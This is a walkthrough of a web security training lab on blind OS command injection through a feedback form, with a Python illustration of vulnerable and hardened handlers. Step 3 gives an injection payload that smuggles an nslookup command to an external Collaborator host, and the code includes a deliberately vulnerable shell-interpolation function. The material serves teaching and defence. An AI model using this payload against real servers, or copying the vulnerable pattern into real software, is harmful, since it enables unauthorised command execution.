Blind OS command injection with out-of-band interaction
Lab Description

Walkthrough
Step 1: Understanding the Feedback Functionality
The Submit Feedback page contains four input fields:
Name
Email
Subject
Message
Our goal is to test whether these fields are vulnerable to command injection by leveraging out-of-band (OOB) interactions via DNS lookups to Burp Collaborator.

Step 2: Intercepting the Feedback Request
Using Burp Suite, intercept the HTTP request when submitting feedback. The intercepted request will contain parameters corresponding to the form inputs.
Objective: Modify one of these parameters to execute a payload that triggers a DNS lookup to Burp Collaborator.

Step 3: Crafting and Injecting the Payload
In the Email field, inject the following payload:
||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
This payload triggers a DNS lookup for the subdomain generated by Burp Collaborator, confirming that the server executes commands.
Payload Breakdown:
||: Terminates the preceding shell command so that what follows runs as a separate command.
nslookup: A command that performs a DNS lookup.
x.BURP-COLLABORATOR-SUBDOMAIN: Replace with the subdomain generated by Burp Collaborator so the lookup can be monitored.
Submit the request with the modified payload.
The server responds with 200 OK, indicating the request was accepted; whether the payload actually executed is confirmed in the next step, since the response itself carries no command output.

Step 4: Verifying Out-of-Band Interaction
Switch to the Burp Collaborator tab and click Poll now.
Observe DNS requests generated by the server to your subdomain.

Why Use Out-of-Band Interaction?
When the server does not return command output or write it to an accessible location, OOB interaction is the best way to verify that a command was executed. DNS lookups leave a trace on external systems, enabling confirmation of blind vulnerabilities without requiring direct output.
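The server-side root cause behind the Step 3 payload, as an added illustration rather than the lab's own code: a feedback handler that splices the Email field into a shell command line (where `||` becomes control syntax) next to a hardened handler that validates the address and passes it as a discrete argument with no shell in between. The `mail` command, the function names and the regex are assumptions; the decoded payload below is a constructed sample of the lab's, with `+` read as a form-encoded space.

```python
import re
import shlex
import subprocess

# Constructed sample of the lab payload after form decoding ('+' is a space).
PAYLOAD = "||nslookup x.BURP-COLLABORATOR-SUBDOMAIN||"

# Deliberately vulnerable: the email is interpolated into one shell string,
# so shell operators inside the field are parsed as commands, not data.
def vulnerable_command_line(email: str) -> str:
    return f"mail -s 'Feedback received' {email}"

# Hardening layer 1: a conservative allow-list for the address (assumed regex).
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

def is_valid_email(email: str) -> bool:
    return bool(EMAIL_RE.fullmatch(email))

# Hardening layer 2: build an argv list, so no shell ever tokenises the value.
def hardened_argv(email: str) -> list[str]:
    if not is_valid_email(email):
        raise ValueError("rejected email field")
    return ["mail", "-s", "Feedback received", email]

def send_hardened(email: str) -> None:
    # shell=False (the default) executes argv directly; a '||' in the field
    # would reach 'mail' as a literal argument, never a shell.
    subprocess.run(hardened_argv(email), check=False)

# Fallback for legacy code that cannot drop the shell: quote the value so the
# whole field becomes a single shell word. Validation above is still required.
def legacy_quoted_command_line(email: str) -> str:
    return f"mail -s 'Feedback received' {shlex.quote(email)}"
```

Compare the three command forms for `PAYLOAD`: the vulnerable string contains a bare `||nslookup`, the quoted string wraps the entire field in single quotes, and the argv version rejects it before any command is built.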